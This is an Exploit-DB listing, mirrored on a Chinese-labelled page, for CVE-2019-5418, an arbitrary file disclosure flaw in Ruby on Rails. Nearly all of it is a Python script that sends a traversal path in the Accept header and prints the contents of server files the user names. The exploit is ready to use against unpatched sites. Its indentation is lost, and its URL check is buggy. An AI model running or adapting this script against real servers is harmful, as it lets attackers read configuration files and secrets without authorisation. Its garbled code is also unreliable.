Rails 5.2.1 – Arbitrary File Content Disclosure

  • 作者: NotoriousRebel
    日期: 2019-03-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46585/
  • '''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys

try:
import requests
except ImportError:
print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
sys.exit(1)


def banner():
banner = """
----------------------------------------------
Arbitrary Traversal exploit for Ruby on Rails
CVE-2019-5418
----------------------------------------------
"""
print(banner)

def check_args():
if len(sys.argv) != 2:
print("Invalid number of arguments entered!")
how_to_use = "python3 Bandit.py url"
print('Use as:', how_to_use)
sys.exit(1)


def check_url(url):
status_code = requests.get(url)
if status_code != 200:
print("Url is invalid or can not be reached!")
sys.exit(1)


def read_file(url, file):
headers = {'Accept': file + '{{'}
req = requests.get(url, headers=headers)
return req


def main():
banner()
check_args()
url = sys.argv[1]
while True:
try:
file = input("Enter file to read (enter quit to exit): ")
except Exception:
file = raw_input("Enter file to read (enter quit to exit): ")
try:
if file.lower() == 'quit':
break
except Exception:
if file == 'quit':
break
response = read_file(url, file)
print(response.text)


if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')